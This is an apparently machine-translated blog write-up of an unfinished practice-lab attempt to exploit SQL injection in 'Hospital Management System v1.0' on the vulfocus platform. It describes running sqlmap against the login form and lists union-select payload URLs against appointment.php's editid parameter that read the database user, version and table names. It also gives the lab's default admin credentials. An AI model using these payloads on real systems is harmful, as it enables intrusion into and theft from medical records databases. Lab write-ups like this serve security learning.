Preface

During the summer vacation, I have nothing to do to shoot a target
It's using vulfocus Online platform , I used it for the first time , I didn't expect that only 15min, and , There is no wp, This recurrence is not complete , Let's talk about the process

Vulnerability description

Hospital management system (HMS) It is a system based on computer or network , It helps to manage the operation of hospitals or any medical institutions . The system or software will help make the whole function paperless . It will be about patients 、 Doctor 、 staff 、 All the information of hospital management details is integrated into one software . It consists of various professionals in the hospital .

HMS v1.0 Be found to contain through adminlogin.php、Patientlogin.php Of SQL Inject holes . admin/123456789

The recurrence process

Train of thought

I thought the description admin and 123456789 It's the end result , You need to inject what you get .

Just go straight up sqlmap 了

On the login screen There are two parameters

Enter one randomly and grab it

the reason being that post request , You need to export the data package , selected loginid Parameters

You can see that there are four databases

selected hms The library queries the tables

Because time is too slow , But the time for a target aircraft environment is only 15min
Here we see user surface , Directly select user Watch

Inquire about user Column in table


Here you can see that there are three fields

Read The values of these three fields

Come here , I found the password is wrong , No 123456789
This idea has been interrupted here

Train of thought two

This idea refers to https://www.cnblogs.com/HOPEAMOR/p/16251404.html

the reason being that appointment.php In the document editid Parameter vulnerability , So you need to log in

find appointment page

send out payload

/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,user()%23# View current connected users 

/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,database()%23# View the currently connected database 

/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,version()%23# View the current database version 

/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%23# Query all tables 

Finally, time-based injection ,emm I didn't understand this , No response , I don't know which table to read

Because I want to watch a play at the weekend

This idea is also temporarily interrupted ……